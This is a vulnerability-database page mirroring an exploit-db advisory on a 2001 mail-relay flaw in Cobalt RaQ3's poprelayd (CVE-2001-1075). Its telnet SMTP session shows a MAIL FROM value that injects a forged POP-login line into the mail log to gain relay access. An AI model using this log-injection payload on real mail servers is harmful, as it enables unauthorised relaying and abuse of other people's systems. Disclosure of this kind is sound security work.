Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbAndrea BarisaniEDB-ID:20994
HistoryJul 04, 2001 - 12:00 a.m.

Cobalt Raq3 PopRelayD - Arbitrary SMTP Relay

2001-07-0400:00:00
Andrea Barisani
www.exploit-db.com
25

AI Score

7.4

Confidence

Low

JSON
source: https://www.securityfocus.com/bid/2986/info

poprelayd is a script that parses /var/log/maillog for valid pop logins, and based upon the login of a client, allows the person logged into the pop3 service to also send email from the ip address they're accessing the system with.

poprelayd doesn't authenticate output to the /var/log/maillog file. This makes it possible for a user to create an arbitrary string via sendmail that will be logged to the file, thus allowing a remote user to relay mail through the SMTP server. 

telnet dumbcobalt 25
Trying 123.123.123.123...
Connected to dumbcobalt
...
ehlo dumbcobalt
...
mail from:"POP login by user "admin" at (66.66.66.66) 66.66.66.66
@linux.org"
553 "POP login by user "admin" at (66.66.66.66) 66.66.66.66
@linux.org"...Domain name required

Related

cvelist 1
openvas 1
nvd 1
nessus 1
cve 1
cvelist
cvelist
CVE-2001-1075
2002-03-09 05:00:00
openvas
openvas
poprelayd & sendmail Authentication Problem
2005-11-03 00:00:00
nvd
nvd
CVE-2001-1075
2001-07-04 04:00:00
nessus
nessus
poprelayd & sendmail Arbitrary Mail Relay
2002-08-14 00:00:00
cve
cve
CVE-2001-1075
2002-03-09 05:00:00

AI Score

7.4

Confidence

Low

JSON
Related for EDB-ID:20994
cvelist1openvas1nvd1nessus1cve1